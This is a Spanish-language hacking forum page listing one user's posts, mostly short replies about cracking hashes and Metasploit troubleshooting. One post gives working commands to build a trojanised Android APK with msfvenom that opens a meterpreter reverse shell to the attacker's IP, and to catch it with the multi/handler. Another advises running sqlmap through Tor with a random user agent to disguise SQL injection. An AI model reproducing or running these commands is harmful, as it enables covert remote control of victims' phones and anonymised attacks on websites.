Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#181
No sé como funciona pero puede partirse la imagen,
Código (php) [Seleccionar]
/api/image?c=03AEHxwuySz_QZhgT3jACUqO44AY_nd7676ZydIadJeK2NMODnzzNPJaIZJwDSDd4ze0IsC9b5bbbB4Mxs1Pb79SFqAP3sJB9XTBrqf7iWAJXW9pypIxcMjzDgN0-M9ic1oz-Eyk6BFvz_77KwPE8CuvLKixa_ZI_oBiveAOTA7uVMhjpiZN_rTn93EVvLNVO2trXUeRl1jam6uPHl-i4kMjme9pxyEM1Bqw
#182
Seguridad / Re: Descifrar Hash
17 Julio 2017, 20:29 PM
Cita de: Randomize en 17 Julio 2017, 19:56 PM
rgCc4bOhCZJTQ
Que quieres decir con eso Randomize?

---

Cita de: kazenoou en 17 Julio 2017, 19:27 PM
😭😭 no encuentro en ningún lado como crackearlo
Di como lo sacaste, porque a veces como dice engel lex tiene un salt/semilla.
#184
Seguridad / Re: Descifrar Hash
17 Julio 2017, 14:44 PM
De donde lo sacaste? Porque de una buena de db no lo encontró.  :silbar:
#186
Bugs y Exploits / Re: duda con metasploit
13 Julio 2017, 15:08 PM
No se que tan cierto sea pero dicen que usando reverse_https solucionas el problema.  :silbar:
#187
@fisica 638, es totalmente falso BATCH es un "lenguaje" limitado pero cumple con esas funciones...  MIRA
#188
@Avispon99 Te mande privado.

---

1. Creación del APK
Código (bash) [Seleccionar]
msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk

2. Ejecuta el APK en el dispositivo

3. Entrar el MSF
Código (bash) [Seleccionar]
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost {YOUR IP}
set lport 4444
exploit
#189
1. Prueba usando tor con sqlmap --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 y agrega el parametro --random-agent.
2. ' = %27, esto es lo que se conoce como Unicode. :http://www.online-toolz.com/tools/text-unicode-entities-convertor.php